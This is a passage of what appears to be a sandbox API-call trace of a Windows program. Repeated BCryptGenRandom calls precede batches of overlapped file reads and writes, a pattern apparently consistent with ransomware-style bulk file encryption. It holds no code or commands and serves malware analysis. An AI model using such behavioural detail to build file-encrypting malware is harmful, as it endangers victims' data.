lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.515] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.515] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.534] ReadFile (in: hFile=0x3c4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x135b, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.546] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.555] WriteFile (in: hFile=0x3c0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0xc10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.555] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.942] CloseHandle (hObject=0x3bc) returned 1 [0082.942] free (_Block=0x1fb18c0) [0082.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.958] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.976] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.990] CloseHandle (hObject=0x3b8) returned 1 [0082.991] free (_Block=0x3db00b8) [0082.994] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.235] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.244] CloseHandle (hObject=0x3bc) returned 1 [0083.245] free (_Block=0x1fb18c0) [0083.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.246] CloseHandle (hObject=0x3b8) returned 1 [0083.261] free (_Block=0x1ff1e60) [0083.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.273] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0083.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0083.274] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.274] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.274] free (_Block=0x1ff1e60) [0083.275] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.275] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.275] free (_Block=0x1ff1e60) [0083.275] free (_Block=0x1ff1930) [0083.275] free (_Block=0x77d800) [0083.275] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.279] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.285] CloseHandle (hObject=0x3b8) returned 1 [0083.286] free (_Block=0x1fb18c0) [0083.286] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0083.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0083.296] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.296] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.297] free (_Block=0x1ff1e60) [0083.297] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.297] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.297] free (_Block=0x1ff1e60) [0083.297] free (_Block=0x1ff1930) [0083.297] free (_Block=0x77d800) [0083.297] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.297] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.302] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.305] CloseHandle (hObject=0x3b8) returned 1 [0083.306] free (_Block=0x1fb18c0) [0083.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0083.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0083.316] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.316] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.316] free (_Block=0x1ff1e60) [0083.316] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.316] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.317] free (_Block=0x1ff1e60) [0083.317] free (_Block=0x1ff1930) [0083.317] free (_Block=0x77d800) [0083.317] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.321] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.324] CloseHandle (hObject=0x3b8) returned 1 [0083.325] free (_Block=0x1fb18c0) [0083.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.333] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0083.334] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.334] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.334] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0083.334] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.334] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.335] free (_Block=0x1ff1e60) [0083.335] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.335] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.335] free (_Block=0x1ff1e60) [0083.335] free (_Block=0x1ff1930) [0083.335] free (_Block=0x77d800) [0083.335] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.335] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.337] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.337] CloseHandle (hObject=0x3b8) returned 1 [0083.338] free (_Block=0x1fb18c0) [0083.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0083.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0083.348] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0083.348] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0083.348] free (_Block=0x1ff1e60) [0083.348] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0083.348] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0083.348] free (_Block=0x1ff1e60) [0083.348] free (_Block=0x1ff1930) [0083.348] free (_Block=0x77d800) [0083.348] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.348] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.349] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x2ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.370] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x39eaa, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.431] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x3dd24, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.462] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.466] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.486] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.491] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.511] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xbc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0083.511] CloseHandle (hObject=0x3b8) returned 1 [0083.516] free (_Block=0x1fb18c0) [0083.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0084.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0084.131] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0084.131] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0084.131] free (_Block=0x1ff1e60) [0084.131] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0084.131] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0084.132] free (_Block=0x1ff1e60) [0084.132] free (_Block=0x1ff1930) [0084.132] free (_Block=0x77d800) [0084.132] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.132] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.164] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xbc8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0084.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.175] ReadFile (in: hFile=0x3bc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x7f9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0084.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.190] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0084.190] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.191] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0084.195] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0084.195] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0084.195] free (_Block=0x77d800) [0084.195] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0084.195] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0084.196] free (_Block=0x2031ed0) [0084.196] free (_Block=0x2031fe0) [0084.196] free (_Block=0x77d908) [0084.196] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0084.197] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0084.210] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.211] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0084.211] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0084.211] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0084.212] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0084.216] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0084.216] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0084.216] free (_Block=0x77d800) [0084.216] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0084.216] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0084.216] free (_Block=0x1ff1930) [0084.216] 